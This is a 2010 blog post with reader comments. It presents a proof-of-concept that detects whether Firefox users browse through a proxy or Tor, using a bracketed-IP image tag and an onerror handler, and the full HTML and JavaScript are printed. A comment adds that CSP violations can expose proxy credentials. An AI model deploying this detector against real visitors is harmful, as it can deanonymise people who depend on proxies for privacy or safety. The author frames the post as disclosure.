Detect Proxy Usage in Firefox

August 22nd, 2010 | 6,212 views | 13 Comments » |

I recently read about an interesting browser information leak on ha.ckers.org and decided to code up a proof-of-concept.

It allows a malicious website to detect whether the user is browsing through a proxy or not by using image tags. Proxies are often used by corporations, political dissidents, and privacy conscience Internet users because they can provide additional security or anonymous Internet browsing.

Here’s how the exploit works:

Firefox uses square brackets [ ] to denote IPv6 addresses, but this notation also works to describe IPv4 addresses (I’m not sure exactly why).

So, if we embed an image with src=”http://[74.207.246.197]/pic.jpg” into a page, Firefox automatically resolves [74.207.246.197] into the IP address 74.207.246.197.

However, if the user is browsing through a proxy, this automatic resolution doesn’t happen. Instead, Firefox asks the proxy to do a DNS lookup for the “domain” [74.207.246.197], which obviously fails since it’s not a valid domain name.

Most proxies don’t know how to handle the bracketed domain, so the DNS lookup fails. I’ve tested this on Tor (popular proxy for anonymous Internet browsing), PHP Proxy and CGI Proxy (the top two web-based proxies), and Proxify (popular commercial web proxy).

So, if the image fails to load, we know that the user is browsing through a proxy. Add some Javascript to detect when the image fails to load and you’ve got a working proxy detector.

Demo
(Works in: Firefox 3+. Update: Looks like it works in Safari 5, too.)

This, of course, assumes that the user is not blocking cross-domain requests. Also, my implementation requires Javascript to be enabled, but that’s not a necessity.

Here’s the code I wrote:

<script type="text/javascript" charset="utf-8">
    function setUsingProxy() {
        proxy = document.getElementById('proxy');
        proxy.style.display = 'block';
        no_proxy = document.getElementById('no_proxy');
        no_proxy.style.display = 'none';

    }
</script>

<div id="proxy" style="display:none;">
    You are accessing the Internet through a proxy (corporate proxy, VPN, or <a href="http://www.torproject.org/">Tor</a>).
</div>

<div id="no_proxy">
    You are accessing the Internet directly. No proxy.
</div>

<img src="http://[74.207.246.197]/organize.jpg" style="height:0;width:0;display:none;" onerror="setUsingProxy()">

This attack only affects Firefox, as far as I can tell.

Credit for the idea: Ha.ckers – Quick Proxy Detection

You should share this with your friends:

13 Comments | Leave a comment » More posts about: Hacks

13 Comments on “Detect Proxy Usage in Firefox”

  1. 1 Suhana said at 1:20 am on August 24th, 2010:

    Oh, that’s so neat, now I just wish this were across all browsers – simple, but effective.

  2. 2 Feross Aboukhadijeh said at 3:28 pm on August 25th, 2010:

    Hi Suhana,

    I agree – this would be even cooler if it worked in all browsers. I did some more testing, and it looks like it works in Safari too!

    -Feross

  3. 3 sprrigan said at 10:49 pm on August 27th, 2010:

    Hi Feross

    it worked with IE7..

    I wasn’t using any proxy and clicked on your demo and it said I was accessing the internet directly

    good job

  4. 4 Linto said at 3:52 am on September 11th, 2010:

    This disgusts me and is an invasion of privacy.

  5. 5 Feross Aboukhadijeh said at 4:10 am on September 11th, 2010:

    I’m not recommending that anyone actually use this vulnerability. The point of this post was to prove that, whether we like it or not, this sort of attack is technically possible. So, we should be aware of it and (hopefully) fix the problem.

  6. 6 Ravi said at 7:37 am on September 13th, 2010:

    It worked wrong for me..I am accessing via proxy but its says Internet Diretly..what cud be the reason behind it.

  7. 7 Feross Aboukhadijeh said at 5:39 pm on September 13th, 2010:

    Are you using Firefox?

  8. 8 SAcha Yunusic said at 3:49 am on September 14th, 2010:

    Feross,

    Your code only works with Explicit Proxy, not transparent Proxy. I just tried and when I was transparent, it appeears that I was directly connected to the Web, even that I’m possitive I was passing thru a proxy (Transparent proxy, but proxy at the end).
    Regards,

    Sacha.

  9. 9 beta said at 2:27 pm on February 21st, 2011:

    Great trick, I combined it with the techniques I’ve used previously and it seems integrate and work fine. The only way I’ve managed to bypass it using Firefox was when I was using my OpenVPN server as gateway to route my traffic over it.

    Thanks for the post

  10. 10 Feross Aboukhadijeh said at 12:53 am on February 22nd, 2011:

    Beta, are you using this technique in production? What are you using it for?

  11. 11 fonseka said at 1:12 am on April 6th, 2011:

    Hi!
    Somethings aren’t cross browser when it comes to the web. It really is annoying. Once I worked on a way to allow users only from certain MAC addresses. But to get the MAC I needed to use WQL and it works with IE only.
    Keep up the good work, and good luck.

  12. 12 Rajesh Namase said at 10:40 am on September 15th, 2011:

    Hey, thanks for giving this code.

  13. 13 Nafeez Ahamed said at 8:33 am on September 22nd, 2011:

    If you use the CSP Headers and deliberately force a violation , most of the proxy details including the authentication credentials can be obtained by the server.

Leave a Reply

Fork me on GitHub